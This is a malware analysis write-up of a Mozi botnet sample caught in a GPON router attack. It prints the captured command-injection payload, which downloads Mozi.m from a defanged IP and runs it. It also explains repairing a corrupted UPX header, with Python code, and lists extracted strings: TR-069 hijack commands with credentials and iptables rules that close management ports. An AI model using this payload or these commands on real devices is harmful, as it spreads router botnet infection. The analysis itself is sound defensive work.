An ELF file was recovered from a GPON router authentication bypass and command injection attempt.

SHA256 Hash: 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b

Payload: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=";wget+hxxp://116.114.95[.]110:46049/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0

36/58 Detections on VirusTotal: https://www.virustotal.com/gui/file/832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b/detection

A hex dump via “xxd” verifies that the ELF file is UPX packed.

Unpack attempts via “upx -d” fail with the error “p_info corrupted”.

ELF File Fails to Unpack.

“p_info” is a 12-byte structure in the packed program header. Below, it can be seen filled with zeros.

“p_info” holds the size of the unpacked file, so “p_info” and “p_filesize” carry the same value. “p_filesize” is found at the end of the file, shown below in blue.

Hex: 00042A7C (big-endian)

Below, bytes 5–12 of “p_info” are replaced with the value found in “p_filesize”.

The ELF file can now be unpacked successfully, as shown below.

ELF File with Fixed “p_info” Section
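The p_info repair described above, as an added Python example (not code from the original write-up): it parses the ELF header to find l_info and p_info, reads the unpacked size from the trailing UPX PackHeader, and writes it into p_filesize and p_blocksize in the target's byte order. The UPX layout it relies on (l_info then p_info right after the program headers; a 32-byte little-endian PackHeader plus a 4-byte overlay offset at the end of the file) is assumed from the UPX ELF format, and the sample it builds is a constructed stand-in, not the Mozi binary.

```python
import struct

UPX_MAGIC = b"UPX!"

def locate_p_info(data):
    """Offset of the 12-byte p_info (p_progid, p_filesize, p_blocksize) and its
    byte order. p_info follows the 12-byte l_info after the program headers and
    is stored in the target's byte order (hence 00 04 2A 7C on big-endian MIPS)."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    bo = "<" if data[5] == 1 else ">"                  # EI_DATA: 1 = LE, 2 = BE
    if data[4] == 2:                                   # ELFCLASS64
        e_phoff, = struct.unpack_from(bo + "Q", data, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(bo + "HH", data, 0x36)
    else:                                              # ELFCLASS32
        e_phoff, = struct.unpack_from(bo + "I", data, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(bo + "HH", data, 0x2A)
    l_info = e_phoff + e_phnum * e_phentsize
    if data[l_info + 4:l_info + 8] != UPX_MAGIC:       # l_magic field of l_info
        raise ValueError("l_info magic missing: not a UPX-packed ELF")
    return l_info + 12, bo

def fix_p_info(data):
    """Return (patched_bytes, unpacked_size). The size comes from the trailing
    PackHeader (always little-endian: "UPX!" at EOF-36, u_file_size at EOF-12,
    then the 4-byte overlay offset) and is written into p_filesize/p_blocksize
    whenever they would fail upx's own 'p_info corrupted' sanity check."""
    if data[-36:-32] != UPX_MAGIC:
        raise ValueError("trailing PackHeader missing: overlay stripped?")
    u_file_size, = struct.unpack_from("<I", data, len(data) - 12)
    p_info, bo = locate_p_info(data)
    p_filesize, p_blocksize = struct.unpack_from(bo + "II", data, p_info + 4)
    if p_filesize == u_file_size and 0 < p_blocksize <= u_file_size:
        return bytes(data), u_file_size                # already consistent
    patched = bytearray(data)
    struct.pack_into(bo + "II", patched, p_info + 4, u_file_size, u_file_size)
    return bytes(patched), u_file_size

def build_sample(unpacked_size=273020):
    """Constructed stand-in for the zeroed sample (not the real Mozi file):
    big-endian ELF32 header, two empty program headers, l_info, an all-zero
    p_info, filler, then the LE PackHeader and overlay offset at the end."""
    ident = b"\x7fELF" + bytes([1, 2, 1]) + bytes(9)   # ELF32, big-endian, SysV
    hdr = ident + struct.pack(">HHIIIIIHHHHHH", 2, 8, 1, 0, 52, 0, 0, 52, 32, 2, 0, 0, 0)
    l_info = bytes(4) + UPX_MAGIC + bytes([0, 0, 13, 12])
    trailer = (UPX_MAGIC + bytes([13, 12, 2, 9])
               + struct.pack("<IIIII", 0, 0, unpacked_size, 1000, unpacked_size)
               + bytes(4) + struct.pack(">I", 128))
    return hdr + bytes(64) + l_info + bytes(12) + bytes(64) + trailer
```

On a real sample, read the packed file, pass the bytes to fix_p_info, write the returned bytes to a new file and run “upx -d” on that copy.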

13/58 Detections on VirusTotal: https://www.virustotal.com/gui/file/00fc81a4279c2141ba438ee0dabba07d5bdcdde090d0fc87a241111e488aa202/detection

ELF File Unpacked:

24/59 Detections on VirusTotal: https://www.virustotal.com/gui/file/86a159452462eb3143a74d780d134af95816e44e0954e165742edd394240b535/detection

Note: VirusTotal reports the size of the unpacked ELF file as 266.62 KB. The hex value 00042A7C (big-endian) is 273020 in decimal, and 273020 bytes / 1024 = 266.62 KB, so the restored size matches.

String analysis via FLOSS:

Domains:

IP Addresses:
212.129.33[.]59:6881
82.221.103[.]244:6881
130.239.18[.]159:6881
87.98.162[.]88:6881

Exploits:
gpon
realtek
netgear
huawei
tr064
hnap
camcrossweb
camjaws
dlink
r7064
vacron

Sendcmd & Commands:
sendcmd 1 DB set MgtServer 0 Tr069Enable 1
sendcmd 1 DB set PdtMiddleWare 0 Tr069Enable 0
sendcmd 1 DB set MgtServer 0 URL http://127.0.0.1
sendcmd 1 DB set MgtServer 0 UserName notitms
sendcmd 1 DB set MgtServer 0 ConnectionRequestUsername notitms
sendcmd 1 DB set MgtServer 0 PeriodicInformEnable 0
sendcmd 1 DB save
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"
/proc/self/oom_score_adj -1000
echo 3 > /proc/sys/vm/drop_caches
* Username (“notitms”) and password (“acsMozi”) found for the management server.

Iptables Commands:
iptables -D INPUT -p tcp --dport %d -j ACCEPT
iptables -D OUTPUT -p tcp --sport %d -j ACCEPT
iptables -D PREROUTING -t nat -p tcp --dport %d -j ACCEPT
iptables -D POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
iptables -I INPUT -p tcp --dport %d -j ACCEPT
iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
iptables -I INPUT -p tcp --dport 35000 -j DROP
iptables -I INPUT -p tcp --dport 50023 -j DROP
iptables -I OUTPUT -p tcp --sport 50023 -j DROP
iptables -I OUTPUT -p tcp --sport 35000 -j DROP
iptables -I INPUT -p tcp --dport 7547 -j DROP
iptables -I OUTPUT -p tcp --sport 7547 -j DROP
iptables -I INPUT -p tcp --dport 58000 -j DROP
iptables -I OUTPUT -p tcp --sport 58000 -j DROP
iptables -I INPUT -p udp --dport %d -j ACCEPT
iptables -I OUTPUT -p udp --sport %d -j ACCEPT
iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
iptables -I INPUT -p tcp --dport 22 -j DROP
iptables -I INPUT -p tcp --dport 23 -j DROP
iptables -I INPUT -p tcp --dport 2323 -j DROP
iptables -I OUTPUT -p tcp --sport 22 -j DROP
iptables -I OUTPUT -p tcp --sport 23 -j DROP
iptables -I OUTPUT -p tcp --sport 2323 -j DROP

User Agents:

Corrupt UPX Packed ELF File Analysis